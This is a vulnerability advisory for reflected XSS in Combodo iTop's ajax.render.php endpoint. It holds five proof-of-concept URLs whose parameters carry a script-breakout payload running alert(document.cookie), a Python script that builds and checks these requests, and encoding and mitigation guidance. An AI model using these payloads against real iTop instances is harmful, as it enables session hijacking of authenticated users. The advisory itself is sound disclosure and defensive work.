Vulnerability Summary

A reflected cross-site scripting (XSS) vulnerability exists in the pages/ajax.render.php endpoint of Combodo iTop, affecting versions before 3.0.4 and versions 3.1.0 up to (but not including) 3.1.1. Several query parameters are reflected into the response without proper output encoding, so an attacker can inject JavaScript that is executed by the victim's browser in the context of the iTop application.

Reflected XSS lets an attacker craft a link that, when opened by an authenticated iTop user, runs attacker-chosen JavaScript in that user's session. The consequences include session hijacking, theft of any data the user can see, and actions performed through the application as the victim.

Affected Parameters

The following parameters in the ajax.render.php endpoint are vulnerable:

  • params[order_by]
  • params[limit]
  • params[order_direction]
  • params[group_by_label]
  • params[currentId]

CVSS v3.1 Metrics

Metric       Value
Base Score   6.1 (MEDIUM)
Vector       CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Weakness Enumeration

CWE ID    Description
CWE-79    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Proof of Concept (PoC)

Authenticated access is required: the victim must be logged in to iTop when the link is opened. Replace <TARGET> with the hostname or IP of the instance and adjust the /itop/ prefix to match the web root the application is deployed under. The payloads are written to break out of an inline script block (`</script>`) and open a new one, so the injected alert(document.cookie) runs as soon as the response is rendered; the xss-test class is only a marker for locating the injected element.

Testing Environment

  • iTop version: 3.1.0-2-11973 (built on 2023-08-02 14:25:30)
  • MySQL: 10.3.38-MariaDB-0ubuntu0.20.04.1
  • PHP: 7.4.3-4ubuntu2.19
  • Browsers used for testing:
    • Brave 1.58.137 (Chromium 117.0.5938.153) – 64-bit
    • Firefox 118.0.1 – 64-bit

PoC #1: params[order_by]

http://<TARGET>/itop/pages/ajax.render.php?c[menu]=UserRequest:Overview&filter=["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE (DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]&id=block_UserRequestOverview_ID_row0_col0_11&operation=chart&params[aggregation_attribute]=&params[aggregation_function]=count&params[chart_type]=pie&params[currentId]=block_UserRequestOverview_ID_row0_col0_11&params[group_by]=UserRequest.request_type&params[group_by_label]=Request Type&params[limit]=&params[order_by]=function</script><svg><script/class=xss-test>alert(document.cookie)</script>-'&params[order_direction]=desc    

PoC #2: params[limit]

http://<TARGET>/itop/pages/ajax.render.php?c[menu]=UserRequest:Overview&filter=["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE (DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]&id=block_UserRequestOverview_ID_row0_col0_11&operation=chart&params[aggregation_attribute]=&params[aggregation_function]=count&params[chart_type]=pie&params[currentId]=block_UserRequestOverview_ID_row0_col0_11&params[group_by]=UserRequest.request_type&params[group_by_label]=Request Type&params[limit]=</ScriPt><sCripT id=xss-test>alert(document.cookie)</sCriPt>&params[order_by]=function&params[order_direction]=desc  

PoC #3: params[order_direction]

http://<TARGET>/itop/pages/ajax.render.php?c[menu]=UserRequest:Overview&filter=["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE (DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]&id=block_UserRequestOverview_ID_row0_col0_11&operation=chart&params[aggregation_attribute]=&params[aggregation_function]=count&params[chart_type]=pie&params[currentId]=block_UserRequestOverview_ID_row0_col0_11&params[group_by]=UserRequest.request_type&params[group_by_label]=Request Type&params[limit]=&params[order_by]=function&params[order_direction]=desc</script><svg><script/class=xss-test>alert(document.cookie)</script>-'    

PoC #4: params[group_by_label]

http://<TARGET>/itop/pages/ajax.render.php?c[menu]=UserRequest:Overview&filter=["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE (DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]&id=block_UserRequestOverview_ID_row0_col0_11&operation=chart&params[aggregation_attribute]=&params[aggregation_function]=count&params[chart_type]=pie&params[currentId]=block_UserRequestOverview_ID_row0_col0_11&params[group_by]=UserRequest.request_type&params[group_by_label]=Request Type</script><svg><script/class=xss-test>alert(document.cookie)</script>-'&params[limit]=&params[order_by]=function&params[order_direction]=desc  

PoC #5: params[currentId]

http://<TARGET>/itop/pages/ajax.render.php?c[menu]=UserRequest:Overview&filter=["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE (DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]&id=block_UserRequestOverview_ID_row0_col0_11&operation=chart&params[aggregation_attribute]=&params[aggregation_function]=count&params[chart_type]=pie&params[currentId]=block_UserRequestOverview_ID_row0_col0_11</script><svg><script/class=xss-test>alert(document.cookie)</script>-'&params[group_by]=UserRequest.request_type&params[group_by_label]=Request Type&params[limit]=&params[order_by]=function&params[order_direction]=desc    
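The five requests above differ only in which parameter carries the payload. The following Python script is an added example, not code from this advisory or from iTop: it builds the same request for each affected parameter with correct URL encoding, and classifies a response body as reflecting the payload unencoded, encoded, or not at all. The target host (192.0.2.10, a documentation address) and the two sample response bodies are constructed for the offline demo; iTop's real response markup is not reproduced here. To reproduce against a live instance, send the URL from build_poc_url with an authenticated session and pass the response body to classify_reflection.

```python
import html
from urllib.parse import urlencode, urlparse, parse_qs

# Parameters the advisory lists as vulnerable in pages/ajax.render.php.
AFFECTED_PARAMS = [
    "params[order_by]",
    "params[limit]",
    "params[order_direction]",
    "params[group_by_label]",
    "params[currentId]",
]

# Canary payload used by the advisory's PoCs: closes the inline script the
# value is echoed into, opens a fresh one, and carries a marker class.
PAYLOAD = "</script><svg><script/class=xss-test>alert(document.cookie)</script>-'"

# Base query string of the PoC requests (chart rendering of the UserRequest
# overview dashlet), in the order the advisory uses it.
BASE_QUERY = {
    "c[menu]": "UserRequest:Overview",
    "filter": '["SELECT `UserRequest` FROM UserRequest AS `UserRequest` WHERE '
              '(DATE_SUB(NOW(), INTERVAL 14 DAY) < `UserRequest`.`start_date`)",[],[]]',
    "id": "block_UserRequestOverview_ID_row0_col0_11",
    "operation": "chart",
    "params[aggregation_attribute]": "",
    "params[aggregation_function]": "count",
    "params[chart_type]": "pie",
    "params[currentId]": "block_UserRequestOverview_ID_row0_col0_11",
    "params[group_by]": "UserRequest.request_type",
    "params[group_by_label]": "Request Type",
    "params[limit]": "",
    "params[order_by]": "function",
    "params[order_direction]": "desc",
}


def build_poc_url(target, param, payload=PAYLOAD, base_path="/itop"):
    """Return the PoC URL with `payload` appended to `param`, URL-encoded.

    `target` is scheme+host (e.g. "http://192.0.2.10"); `base_path` is the
    deployment's web root prefix (the advisory's instance lives under /itop/).
    The payload is appended to the parameter's normal value, as the PoCs do.
    """
    if param not in AFFECTED_PARAMS:
        raise ValueError(f"{param!r} is not one of the affected parameters")
    query = dict(BASE_QUERY)
    query[param] = query[param] + payload
    return f"{target.rstrip('/')}{base_path}/pages/ajax.render.php?{urlencode(query)}"


def decoded_query(url):
    """Decode the query string of `url` back into {name: [values]}."""
    return parse_qs(urlparse(url).query)


def classify_reflection(body, payload=PAYLOAD):
    r"""Classify how `payload` comes back in a response body.

    "unencoded": verbatim, i.e. the markup reaches the HTML parser intact;
    "encoded":   present but neutralised (HTML entities, or `</` turned into
                 `<\/` inside a script string literal);
    "absent":    not reflected at all (rejected, truncated, or a different page).
    """
    if payload in body:
        return "unencoded"
    neutralised_forms = (
        html.escape(payload, quote=True),
        html.escape(payload, quote=False),
        payload.replace("</", "<\\/"),
    )
    if any(form in body for form in neutralised_forms):
        return "encoded"
    return "absent"


def constructed_response(value, encode):
    """Constructed stand-in for the ajax.render.php response (not iTop's real
    markup): the parameter value lands inside an inline script, either raw
    (vulnerable) or HTML-entity encoded (one patched form)."""
    rendered = html.escape(value, quote=True) if encode else value
    return ("<html><body>\n<script>\nvar sOrderBy = '" + rendered + "';\n</script>\n"
            "</body></html>")


def offline_demo():
    """Build every PoC URL and classify the two constructed responses."""
    urls = {p: build_poc_url("http://192.0.2.10", p) for p in AFFECTED_PARAMS}
    results = {
        "vulnerable": classify_reflection(constructed_response(PAYLOAD, encode=False)),
        "patched": classify_reflection(constructed_response(PAYLOAD, encode=True)),
    }
    return urls, results


if __name__ == "__main__":
    urls, results = offline_demo()
    for p, u in urls.items():
        print(p, "->", u[:110] + "...")
    print(results)
```

classify_reflection treats only a verbatim hit as "unencoded"; a response that shows the payload as entities, or with the closing tag escaped, is what a fixed build should produce, and "absent" usually means the request was rejected or answered by a different page (for example a login redirect when the session is missing).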

Suggested Mitigations

  • Encode every reflected value for the context it is written into: HTML-entity encoding for values emitted into HTML text or attributes, and a properly escaped JavaScript string literal (with <, > and & hex-escaped) for values emitted inside an inline script. HTML encoding is not the right encoder for a script context: it blocks the </script> breakout but leaves the entity text in the JavaScript value.
  • Validate these parameters server-side against what they can legitimately hold (for example an integer limit, an asc/desc direction, a known attribute code for the sort key, a markup-free label, and an element id restricted to letters, digits and underscores) and reject anything else. An HTML sanitization library belongs to fields that genuinely carry rich text; none of these parameters does.
  • Deploy a Content Security Policy that disallows inline scripts (a nonce- or hash-based script-src) as defence in depth; a policy that keeps 'unsafe-inline' does not stop this class of injection.
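The first mitigation is the one that actually removes the bug, and the sink the PoC payloads target is an inline script, so the encoder has to be chosen for that context. The following Python block is an added example, not iTop's code or its fix: it places the advisory's payload into a constructed inline-script template three ways (raw, as a hex-escaped JavaScript string literal, and HTML-entity encoded into an HTML text node) and uses the standard library's HTML tokenizer to count how many <script> elements a browser would see. The template and variable name are assumptions for the demo.

```python
import html
import json
from html.parser import HTMLParser

# The advisory's payload: closes the enclosing script, opens a new one.
PAYLOAD = "</script><svg><script/class=xss-test>alert(document.cookie)</script>-'"


def render_unsafe(value):
    """Vulnerable pattern (constructed): the request parameter is
    interpolated raw into an inline script, which is what the payloads need."""
    return "<script>var sOrderBy = '" + value + "';</script>"


def js_string_literal(value):
    """Encode `value` as a JavaScript string literal safe to emit in <script>.

    json.dumps yields a valid JS string literal (quotes, backslashes and
    control characters escaped; with ensure_ascii the U+2028/U+2029 line
    terminators come out as \\u escapes). That alone is not enough: the HTML
    tokenizer runs before the JS parser and honours a literal </script> or
    <!-- inside the string, so <, > and & are hex-escaped as well. The result
    is still valid JSON, so it round-trips (see js_value_roundtrip).
    """
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_safe(value):
    """Hardened form: the value reaches the browser as a string literal
    containing no markup characters at all."""
    return "<script>var sOrderBy = " + js_string_literal(value) + ";</script>"


def render_html_text(value):
    """The other sink type: a value placed in HTML text (or an attribute) is
    HTML-entity encoded. Using this encoder inside a script literal instead
    would stop the breakout but hand the entity text to JavaScript."""
    return "<span>" + html.escape(value, quote=True) + "</span>"


class _ScriptCounter(HTMLParser):
    """Count <script> start tags as the tokenizer sees them."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1


def count_script_tags(markup):
    """Number of <script> elements in `markup`. One is the template's own
    element; more than one means the injected value broke out of it."""
    counter = _ScriptCounter()
    counter.feed(markup)
    counter.close()
    return counter.script_tags


def js_value_roundtrip(value):
    """The value the JS engine holds after evaluating js_string_literal(value):
    JSON and JS share string-escape syntax, so json.loads recovers it."""
    return json.loads(js_string_literal(value))


if __name__ == "__main__":
    print("unsafe   :", count_script_tags(render_unsafe(PAYLOAD)), "script element(s)")
    print("safe     :", count_script_tags(render_safe(PAYLOAD)), "script element(s)")
    print("html text:", count_script_tags(render_html_text(PAYLOAD)), "script element(s)")
    print("literal  :", js_string_literal(PAYLOAD))
    print("roundtrip:", js_value_roundtrip(PAYLOAD) == PAYLOAD)
```

In PHP, the language iTop is written in, the same effect as js_string_literal is obtained with json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT); the essential point is that the encoder is chosen by where the value lands, not by where it came from.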

References